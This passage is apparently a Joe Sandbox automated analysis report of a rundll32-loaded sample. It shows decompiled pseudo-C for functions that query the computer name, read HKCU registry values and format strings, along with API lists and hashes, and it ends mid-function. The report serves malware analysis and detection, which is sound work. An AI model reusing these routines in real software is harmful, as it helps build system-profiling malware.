                                                  • StrChrA.SHLWAPI(?,00000020,00000000,06AF95AC,?,04B323DE,?,04B37634,06AF95AC,?,04B323DE), ref: 04B394C3
                                                  • StrTrimA.KERNELBASE(?,04B3C2A4,00000002,?,04B323DE,?,04B37634,06AF95AC,?,04B323DE), ref: 04B394E2
                                                  • StrChrA.SHLWAPI(?,00000020,?,04B323DE,?,04B37634,06AF95AC,?,04B323DE), ref: 04B394ED
                                                  • StrTrimA.SHLWAPI(00000001,04B3C2A4,?,04B323DE,?,04B37634,06AF95AC,?,04B323DE), ref: 04B394FF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Trim
                                                  • String ID:
                                                  • API String ID: 3043112668-0
                                                  • Opcode ID: f3410c50f84d7a4155302bf6315e49ef7c13fe309127a4963fe311c4a95fcb73
                                                  • Instruction ID: 96b2b6dea34955121e58fd43a92f5a24473f7ff3a38c1a15bca07c53b7aa0781
                                                  • Opcode Fuzzy Hash: f3410c50f84d7a4155302bf6315e49ef7c13fe309127a4963fe311c4a95fcb73
                                                  • Instruction Fuzzy Hash: 1001B5B16053116FD3309E6B8C49F2B7F9CEF85652F120599F885D7240DBB4DC0196A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 373 4b373fd-4b37417 call 4b3a72d 376 4b37419 373->376 377 4b3741c-4b3743e call 4b31262 373->377 376->377 380 4b37444-4b3745e StrToIntExW 377->380 381 4b374fd-4b37502 377->381 384 4b37464-4b37480 call 4b37cb8 380->384 385 4b374ed-4b374ef 380->385 382 4b37504 call 4b31f99 381->382 383 4b37509-4b3750f 381->383 382->383 386 4b374f0-4b374fb HeapFree 384->386 390 4b37482-4b3749b call 4b389d6 384->390 385->386 386->381 393 4b374bd-4b374d9 call 4b32659 390->393 394 4b3749d-4b374a4 390->394 398 4b374de-4b374eb HeapFree 393->398 394->393 395 4b374a6-4b374b8 call 4b389d6 394->395 395->393 398->386
                                                  C-Code - Quality: 100%
                                                  			E04B373FD(void* __edx) {
                                                  				void* _v8;
                                                  				int _v12;
                                                  				WCHAR* _v16;
                                                  				void* __esi;
                                                  				void* _t23;
                                                  				intOrPtr _t24;
                                                  				void* _t26;
                                                  				intOrPtr _t32;
                                                  				intOrPtr _t35;
                                                  				intOrPtr _t38;
                                                  				void* _t40;
                                                  				intOrPtr _t42;
                                                  				void* _t45;
                                                  				void* _t50;
                                                  				void* _t55;
                                                  
                                                  				_t50 = __edx;
                                                  				_v12 = 0;
                                                  				_t23 = E04B3A72D(0,  &_v8); // executed
                                                  				if(_t23 != 0) {
                                                  					_v8 = 0;
                                                  				}
                                                  				_t24 =  *0x4b3d27c; // 0x1fba5a8
                                                  				_t4 = _t24 + 0x4b3ede0; // 0x6af9388
                                                  				_t5 = _t24 + 0x4b3ed88; // 0x4f0053
                                                  				_t26 = E04B31262( &_v16, _v8, _t5, _t4); // executed
                                                  				_t45 = _t26;
                                                  				if(_t45 == 0) {
                                                  					StrToIntExW(_v16, 0,  &_v12);
                                                  					_t45 = 8;
                                                  					if(_v12 < _t45) {
                                                  						_t45 = 1;
                                                  						__eflags = 1;
                                                  					} else {
                                                  						_t32 =  *0x4b3d27c; // 0x1fba5a8
                                                  						_t11 = _t32 + 0x4b3edd4; // 0x6af937c
                                                  						_t48 = _t11;
                                                  						_t12 = _t32 + 0x4b3ed88; // 0x4f0053
                                                  						_t55 = E04B37CB8(_t11, _t12, _t11);
                                                  						_t59 = _t55;
                                                  						if(_t55 != 0) {
                                                  							_t35 =  *0x4b3d27c; // 0x1fba5a8
                                                  							_t13 = _t35 + 0x4b3ee1e; // 0x30314549
                                                  							if(E04B389D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
                                                  								_t61 =  *0x4b3d25c - 6;
                                                  								if( *0x4b3d25c <= 6) {
                                                  									_t42 =  *0x4b3d27c; // 0x1fba5a8
                                                  									_t15 = _t42 + 0x4b3ec2a; // 0x52384549
                                                  									E04B389D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
                                                  								}
                                                  							}
                                                  							_t38 =  *0x4b3d27c; // 0x1fba5a8
                                                  							_t17 = _t38 + 0x4b3ee18; // 0x6af93c0
                                                  							_t18 = _t38 + 0x4b3edf0; // 0x680043
                                                  							_t40 = E04B32659(_v8, 0x80000001, _t55, _t18, _t17); // executed
                                                  							_t45 = _t40;
                                                  							HeapFree( *0x4b3d238, 0, _t55);
                                                  						}
                                                  					}
                                                  					HeapFree( *0x4b3d238, 0, _v16);
                                                  				}
                                                  				_t54 = _v8;
                                                  				if(_v8 != 0) {
                                                  					E04B31F99(_t54);
                                                  				}
                                                  				return _t45;
                                                  			}

                                                  APIs
                                                  • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,06AF9388,00000000,?,7519F710,00000000,7519F730), ref: 04B3744C
                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06AF93C0,?,00000000,30314549,00000014,004F0053,06AF937C), ref: 04B374E9
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04B36814), ref: 04B374FB
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: a36ad7b3803916c7f1d9c78371e14f47c9495fbbbe5c7611ecd982d81d7bec30
                                                  • Instruction ID: 9a48cb5ad8092a1e3e641441c4c1e0e20f9d443a459869b7aa9aaca78af779f3
                                                  • Opcode Fuzzy Hash: a36ad7b3803916c7f1d9c78371e14f47c9495fbbbe5c7611ecd982d81d7bec30
                                                  • Instruction Fuzzy Hash: 37314FB1901118AFEF11DBAADC84E9E7BACEB54706F158096B500A7161D774FE08DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 399 4b38504-4b38526 400 4b38546-4b3854e RtlAllocateHeap 399->400 401 4b38528-4b38530 RtlAllocateHeap 399->401 402 4b38550-4b3855d call 4b3a279 400->402 403 4b38566-4b38568 400->403 401->403 404 4b38532-4b3853f call 4b38b94 401->404 408 4b38562-4b38564 402->408 406 4b38569-4b3856b 403->406 411 4b38544 404->411 409 4b385a9 406->409 410 4b3856d-4b3858e call 4b32496 call 4b3a66e 406->410 408->406 413 4b385af-4b385b5 409->413 417 4b38590-4b385a3 call 4b3a1b0 HeapFree 410->417 418 4b385b8-4b385c9 410->418 411->408 417->409 418->413 419 4b385cb-4b385d2 418->419 419->413
                                                  C-Code - Quality: 54%
                                                  			E04B38504(void* __ecx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                  				void* _v8;
                                                  				void* __edi;
                                                  				intOrPtr _t18;
                                                  				void* _t24;
                                                  				void* _t30;
                                                  				void* _t37;
                                                  				void* _t40;
                                                  				intOrPtr _t42;
                                                  
                                                  				_t32 = __ecx;
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t42 =  *0x4b3d340; // 0x6af8d39
                                                  				_push(0x800);
                                                  				_push(0);
                                                  				_push( *0x4b3d238);
                                                  				if( *0x4b3d24c >= 5) {
                                                  					if(RtlAllocateHeap() == 0) {
                                                  						L6:
                                                  						_t30 = 8;
                                                  						L7:
                                                  						if(_t30 != 0) {
                                                  							L10:
                                                  							 *0x4b3d24c =  *0x4b3d24c + 1;
                                                  							L11:
                                                  							return _t30;
                                                  						}
                                                  						_t44 = _a4;
                                                  						_t40 = _v8;
                                                  						 *_a16 = _a4;
                                                  						 *_a20 = E04B32496(_t44, _t40);
                                                  						_t18 = E04B3A66E(_t37, _t40, _t44);
                                                  						if(_t18 != 0) {
                                                  							 *_a8 = _t40;
                                                  							 *_a12 = _t18;
                                                  							if( *0x4b3d24c < 5) {
                                                  								 *0x4b3d24c =  *0x4b3d24c & 0x00000000;
                                                  							}
                                                  							goto L11;
                                                  						}
                                                  						_t30 = 0xbf;
                                                  						E04B3A1B0();
                                                  						HeapFree( *0x4b3d238, 0, _t40);
                                                  						goto L10;
                                                  					}
                                                  					_t24 = E04B3A279(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
                                                  					L5:
                                                  					_t30 = _t24;
                                                  					goto L7;
                                                  				}
                                                  				if(RtlAllocateHeap() == 0) {
                                                  					goto L6;
                                                  				}
                                                  				_t24 = E04B38B94(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25); // executed
                                                  				goto L5;
                                                  			}

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04B38528
                                                    • Part of subcall function 04B38B94: GetTickCount.KERNEL32 ref: 04B38BA8
                                                    • Part of subcall function 04B38B94: wsprintfA.USER32 ref: 04B38BF8
                                                    • Part of subcall function 04B38B94: wsprintfA.USER32 ref: 04B38C15
                                                    • Part of subcall function 04B38B94: wsprintfA.USER32 ref: 04B38C41
                                                    • Part of subcall function 04B38B94: HeapFree.KERNEL32(00000000,?), ref: 04B38C53
                                                    • Part of subcall function 04B38B94: wsprintfA.USER32 ref: 04B38C74
                                                    • Part of subcall function 04B38B94: HeapFree.KERNEL32(00000000,?), ref: 04B38C84
                                                    • Part of subcall function 04B38B94: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04B38CB2
                                                    • Part of subcall function 04B38B94: GetTickCount.KERNEL32 ref: 04B38CC3
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04B38546
                                                  • HeapFree.KERNEL32(00000000,00000002,04B3685F,?,04B3685F,00000002,?,?,04B32417,?), ref: 04B385A3
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                  • String ID:
                                                  • API String ID: 1676223858-0
                                                  • Opcode ID: 7d43b2663e25cf6973776f732885b44df349c169dd626a63b1305fb72d735299
                                                  • Instruction ID: 290e588105af0c5c1bba6e2ce21685f4e2fa9ee0f20c0916e1e3a6e709d50b00
                                                  • Opcode Fuzzy Hash: 7d43b2663e25cf6973776f732885b44df349c169dd626a63b1305fb72d735299
                                                  • Instruction Fuzzy Hash: 3A213E76211204ABEB11EF96DC84A9E37FCEB49746F114056F901A7140DB74ED409BB2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 90%
                                                  			E04B33DD9(void* __eflags, int _a4) {
                                                  				intOrPtr _v12;
                                                  				WCHAR* _v16;
                                                  				char* _v20;
                                                  				int _v24;
                                                  				void* _v36;
                                                  				char _v40;
                                                  				char _v68;
                                                  				char _v72;
                                                  				char _v76;
                                                  				char _v80;
                                                  				void _v84;
                                                  				char _v88;
                                                  				void* __ebx;
                                                  				void* __esi;
                                                  				intOrPtr _t40;
                                                  				int _t45;
                                                  				intOrPtr _t50;
                                                  				intOrPtr _t52;
                                                  				void* _t55;
                                                  				intOrPtr _t67;
                                                  				void* _t70;
                                                  				void* _t80;
                                                  				WCHAR* _t85;
                                                  				intOrPtr _t5; // temporaries used below but omitted from the decompiler's declarations
                                                  				intOrPtr _t11;
                                                  				intOrPtr _t18;
                                                  				int _t86;
                                                  				void* _t87;
                                                  				void* _t89;
                                                  
                                                  				_v88 = 0;
                                                  				memset( &_v84, 0, 0x2c);
                                                  				_v40 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_t40 =  *0x4b3d27c; // 0x1fba5a8
                                                  				_t5 = _t40 + 0x4b3ee40; // 0x410025
                                                  				_t85 = E04B36A12(_t5);
                                                  				_v16 = _t85;
                                                  				if(_t85 == 0) {
                                                  					_t80 = 8;
                                                  					L24:
                                                  					return _t80;
                                                  				}
                                                  				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
                                                  				if(_t45 != 0) {
                                                  					_t80 = 1;
                                                  					L22:
                                                  					E04B39039(_v16);
                                                  					goto L24;
                                                  				}
                                                  				if(E04B3A72D(0,  &_a4) != 0) {
                                                  					_a4 = 0;
                                                  				}
                                                  				_t50 = E04B3809F(0,  *0x4b3d33c);
                                                  				_v12 = _t50;
                                                  				if(_t50 == 0) {
                                                  					_t80 = 8;
                                                  					goto L19;
                                                  				} else {
                                                  					_t52 =  *0x4b3d27c; // 0x1fba5a8
                                                  					_t11 = _t52 + 0x4b3e81a; // 0x65696c43
                                                  					_t55 = E04B3809F(0, _t11);
                                                  					_t87 = _t55;
                                                  					if(_t55 == 0) {
                                                  						_t80 = 8;
                                                  					} else {
                                                  						_t80 = E04B36BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
                                                  						E04B39039(_t87);
                                                  					}
                                                  					if(_t80 != 0) {
                                                  						L17:
                                                  						E04B39039(_v12);
                                                  						L19:
                                                  						_t86 = _a4;
                                                  						if(_a4 != 0) {
                                                  							E04B31F99(_t86);
                                                  						}
                                                  						goto L22;
                                                  					} else {
                                                  						if(( *0x4b3d260 & 0x00000001) == 0) {
                                                  							L14:
                                                  							E04B38F83(_t80, _v88, _v84,  *0x4b3d270, 0);
                                                  							_t80 = E04B31C74(_v88,  &_v80,  &_v76, 0);
                                                  							if(_t80 == 0) {
                                                  								_v24 = _a4;
                                                  								_v20 =  &_v88;
                                                  								_t80 = E04B342EA( &_v40, 0);
                                                  							}
                                                  							E04B39039(_v88);
                                                  							goto L17;
                                                  						}
                                                  						_t67 =  *0x4b3d27c; // 0x1fba5a8
                                                  						_t18 = _t67 + 0x4b3e823; // 0x65696c43
                                                  						_t70 = E04B3809F(0, _t18);
                                                  						_t89 = _t70;
                                                  						if(_t70 == 0) {
                                                  							_t80 = 8;
                                                  						} else {
                                                  							_t80 = E04B36BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
                                                  							E04B39039(_t89);
                                                  						}
                                                  						if(_t80 != 0) {
                                                  							goto L17;
                                                  						} else {
                                                  							goto L14;
                                                  						}
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                  • memset.NTDLL ref: 04B33DEE
                                                    • Part of subcall function 04B36A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,04B33E14,00410025,00000005,?,00000000), ref: 04B36A23
                                                    • Part of subcall function 04B36A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 04B36A40
                                                  • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04B33E22
                                                  • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 04B33E2D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                  • String ID:
                                                  • API String ID: 3817122888-0
                                                  • Opcode ID: 6f555ae909d2431c02d9c51492136221280b522d7bdcb1d06490813eaa9d9cc8
                                                  • Instruction ID: bac4cd52ed9d2d1e59a8f75473fb080e9817a8302bcf5c5655c764dd36d8340b
                                                  • Opcode Fuzzy Hash: 6f555ae909d2431c02d9c51492136221280b522d7bdcb1d06490813eaa9d9cc8
                                                  • Instruction Fuzzy Hash: 01412072A01218ABEB11EFF6DC849DF7BFCEF08746F4045A6B905A7110D675ED448BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 75%
                                                  			E04B39152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                  				void* _v8;
                                                  				void* __esi;
                                                  				intOrPtr* _t35;
                                                  				void* _t40;
                                                  				intOrPtr* _t41;
                                                  				intOrPtr* _t43;
                                                  				intOrPtr* _t45;
                                                  				intOrPtr* _t50;
                                                  				intOrPtr* _t52;
                                                  				void* _t54;
                                                  				intOrPtr* _t55;
                                                  				intOrPtr* _t57;
                                                  				intOrPtr* _t61;
                                                  				intOrPtr* _t65;
                                                  				intOrPtr _t68;
                                                  				void* _t72;
                                                  				void* _t75;
                                                  				void* _t76;
                                                  				intOrPtr _t20; // temporary used below but omitted from the decompiler's declarations
                                                  
                                                  				_t55 = _a4;
                                                  				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                  				_a4 = 0;
                                                  				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                  				if(_t76 < 0) {
                                                  					L18:
                                                  					return _t76;
                                                  				}
                                                  				_t40 = E04B33AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                  				_t76 = _t40;
                                                  				if(_t76 >= 0) {
                                                  					_t61 = _a28;
                                                  					if(_t61 != 0 &&  *_t61 != 0) {
                                                  						_t52 = _v8;
                                                  						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                  					}
                                                  					if(_t76 >= 0) {
                                                  						_t43 =  *_t55;
                                                  						_t68 =  *0x4b3d27c; // 0x1fba5a8
                                                  						_t20 = _t68 + 0x4b3e1fc; // 0x740053
                                                  						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                  						if(_t76 >= 0) {
                                                  							_t76 = E04B37C14(_a4);
                                                  							if(_t76 >= 0) {
                                                  								_t65 = _a28;
                                                  								if(_t65 != 0 &&  *_t65 == 0) {
                                                  									_t50 = _a4;
                                                  									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                  								}
                                                  							}
                                                  						}
                                                  						_t45 = _a4;
                                                  						if(_t45 != 0) {
                                                  							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                  						}
                                                  						_t57 = SysFreeString; // OLEAUT32 ordinal 6; the APIs list for this function resolves it to SysFreeString
                                                  						if(_a20 != 0) {
                                                  							 *_t57(_a20);
                                                  						}
                                                  						if(_a12 != 0) {
                                                  							 *_t57(_a12);
                                                  						}
                                                  					}
                                                  				}
                                                  				_t41 = _v8;
                                                  				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                  				goto L18;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 04B33AEF: SysAllocString.OLEAUT32(80000002), ref: 04B33B46
                                                    • Part of subcall function 04B33AEF: SysFreeString.OLEAUT32(00000000), ref: 04B33BAB
                                                  • SysFreeString.OLEAUT32(?), ref: 04B39231
                                                  • SysFreeString.OLEAUT32(04B31885), ref: 04B3923B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 986138563-0
                                                  • Opcode ID: 39b44fe33f8bddfdd9d2524ecf7b1f4dca65cb8404a9c911d65029f5e8942ee7
                                                  • Instruction ID: 159e37089587ac68183214bbbdf5cbf1b1ec086a623b5e731895940ad9bbf2c4
                                                  • Opcode Fuzzy Hash: 39b44fe33f8bddfdd9d2524ecf7b1f4dca65cb8404a9c911d65029f5e8942ee7
                                                  • Instruction Fuzzy Hash: 58313AB2900518AFCF21DFAACC88C9BBB79EBC97417154698F8159B210D671AD51CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SysAllocString.OLEAUT32(04B38B1E), ref: 04B31A1D
                                                    • Part of subcall function 04B39152: SysFreeString.OLEAUT32(?), ref: 04B39231
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04B31A5D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 986138563-0
                                                  • Opcode ID: 753901d8e05466d0f75f99d363e471834e7f76c725267952e3cec180fae06429
                                                  • Instruction ID: 2928b040217529f541f24d90159a292604f9dd3bf370b359c5f07b035907e437
                                                  • Opcode Fuzzy Hash: 753901d8e05466d0f75f99d363e471834e7f76c725267952e3cec180fae06429
                                                  • Instruction Fuzzy Hash: BC014F7250050EBBDB119FAAC80899FBBB9EF58312B014062FA05A7110E774EE199BA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E04B354BC(void* __ecx) {
                                                  				signed int _v8;
                                                  				void* _t15;
                                                  				void* _t19;
                                                  				void* _t20;
                                                  				void* _t22;
                                                  				intOrPtr* _t23;
                                                  				signed int _t10; // temporary used below but omitted from the decompiler's declarations
                                                  
                                                  				_t23 = GetComputerNameExA; // unresolved import in the decompiler output; the APIs list for this function identifies it as GetComputerNameExA
                                                  				_t20 = 0;
                                                  				_v8 = _v8 & 0;
                                                  				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                  				_t10 = _v8;
                                                  				if(_v8 != 0) {
                                                  					_t20 = E04B32049(_t10 + 1);
                                                  					if(_t20 != 0) {
                                                  						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                  						if(_t15 != 0) {
                                                  							 *((char*)(_v8 + _t20)) = 0;
                                                  						} else {
                                                  							E04B39039(_t20);
                                                  							_t20 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t20;
                                                  			}

                                                  APIs
                                                  • GetComputerNameExA.KERNELBASE(00000003,00000000,04B3A306,7519F710,00000000,?,?,04B3A306), ref: 04B354D4
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • GetComputerNameExA.KERNELBASE(00000003,00000000,04B3A306,04B3A307,?,?,04B3A306), ref: 04B354F1
                                                    • Part of subcall function 04B39039: HeapFree.KERNEL32(00000000,00000000,04B37F18,00000000,?,?,00000000), ref: 04B39045
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ComputerHeapName$AllocateFree
                                                  • String ID:
                                                  • API String ID: 187446995-0
                                                  • Opcode ID: 7976ef5f8686c07b26171fec2765da5519094a2765008a686b64461381ca628b
                                                  • Instruction ID: 259dbfeb4db1886d1c68afcc654af6a6a264ff5c873f8c40d3a918ddf8e9e705
                                                  • Opcode Fuzzy Hash: 7976ef5f8686c07b26171fec2765da5519094a2765008a686b64461381ca628b
                                                  • Instruction Fuzzy Hash: 0AF05466600149BAEB21D6AB9C40FAF76BDDBC5655F1100A5A904D3140EA70FE059770
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr _t4;
                                                  				void* _t10;
                                                  				void* _t11;
                                                  				void* _t12;
                                                  				void* _t14;
                                                  
                                                  				_t14 = 1;
                                                  				_t4 = _a8;
                                                  				if(_t4 == 0) {
                                                  					if(InterlockedDecrement(0x4b3d23c) == 0) {
                                                  						E04B3970F();
                                                  					}
                                                  				} else {
                                                  					if(_t4 == 1 && InterlockedIncrement(0x4b3d23c) == 1) {
                                                  						_t10 = E04B36A56(_t11, _t12, _a4); // executed
                                                  						if(_t10 != 0) {
                                                  							_t14 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t14;
                                                  			}

                                                  APIs
                                                  • InterlockedIncrement.KERNEL32(04B3D23C), ref: 04B3806A
                                                    • Part of subcall function 04B36A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04B3807D,?), ref: 04B36A69
                                                  • InterlockedDecrement.KERNEL32(04B3D23C), ref: 04B3808A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                  • String ID:
                                                  • API String ID: 3834848776-0
                                                  • Opcode ID: d43f8123608bf297b634223eecef71ee6cb787ff85a2166835116e95f84f1ac5
                                                  • Instruction ID: a1412f7bab43b0702baf34dfcb180788ec00beca90f84cf5ae58636b8d2ea9b4
                                                  • Opcode Fuzzy Hash: d43f8123608bf297b634223eecef71ee6cb787ff85a2166835116e95f84f1ac5
                                                  • Instruction Fuzzy Hash: A3E04F7634422257A7317BB79C04B5EBA94EB00B87F054494F6C5D5070D660F8519AF3
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 34%
                                                  			E04B39318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                  				intOrPtr _v12;
                                                  				void* _v18;
                                                  				short _v20;
                                                  				intOrPtr _t15;
                                                  				short _t17;
                                                  				intOrPtr _t19;
                                                  				short _t23;
                                                  
                                                  				_t23 = 0;
                                                  				_v20 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosw");
                                                  				_t15 =  *0x4b3d27c; // 0x1fba5a8
                                                  				_t4 = _t15 + 0x4b3e39c; // 0x6af8944
                                                  				_t20 = _t4;
                                                  				_t6 = _t15 + 0x4b3e124; // 0x650047
                                                  				_t17 = E04B39152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                  				if(_t17 < 0) {
                                                  					_t23 = _t17;
                                                  				} else {
                                                  					if(_v20 != 8) {
                                                  						_t23 = 1;
                                                  					} else {
                                                  						_t19 = E04B39FC9(_t20, _v12);
